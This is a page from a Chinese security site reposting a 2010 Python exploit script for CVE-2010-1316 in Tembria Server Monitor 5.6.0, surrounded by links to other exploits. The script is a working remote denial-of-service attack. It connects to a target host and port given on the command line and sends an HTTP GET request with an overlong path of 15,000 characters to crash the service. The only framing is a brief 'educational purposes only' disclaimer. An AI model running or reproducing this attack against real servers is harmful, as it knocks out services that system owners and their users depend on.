首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Tembria Server Monitor v5.6.0 Denial of Service
来源:http://www.tembria.com/ 作者:Lincoln 发布时间:2010-04-12  

#!/usr/bin/python
# Exploit Title : Tembria Server Monitor 5.6.0
# CVE-ID        : CVE-2010-1316
# Date          : April 9, 2010
# Author        : Lincoln
# Software Link : http://www.tembria.com/
# Version       : 5.6.0
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : Remote DoS
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                                                  |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "\n[+] Exploit for Tembria Server Monitor 5.6.0"

import socket,sys

#usage ./filename.py IP PORT

host = sys.argv[1]
port = int(sys.argv[2]) #80

buf = "GET /tembria/index.asp/"  + "B" * 15000  + " A" + " HTTP/1.1\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[+] DoS packet sent!\n"
s.send(buf)
s.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel <= 2.6.34-rc3 Rei
·Trellian FTP Client PASV BOF e
·JAVA Web Start Arbitrary comma
·vBulletin "Cyb - Advanced Foru
·WINDOWS FTP SERVER by DWG (Aut
·IE/Opera source code viewer Nu
·Java Deployment Toolkit Perfor
·Elite Gaming Ladders <= v3.5 (
·WinSoftMagic Photo Editor .PNG
·Miniature Java Web Server <= 1
·vBulletin 0-day Denial Of Serv
·CompleteFTP v3.3.0 - Remote Me
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved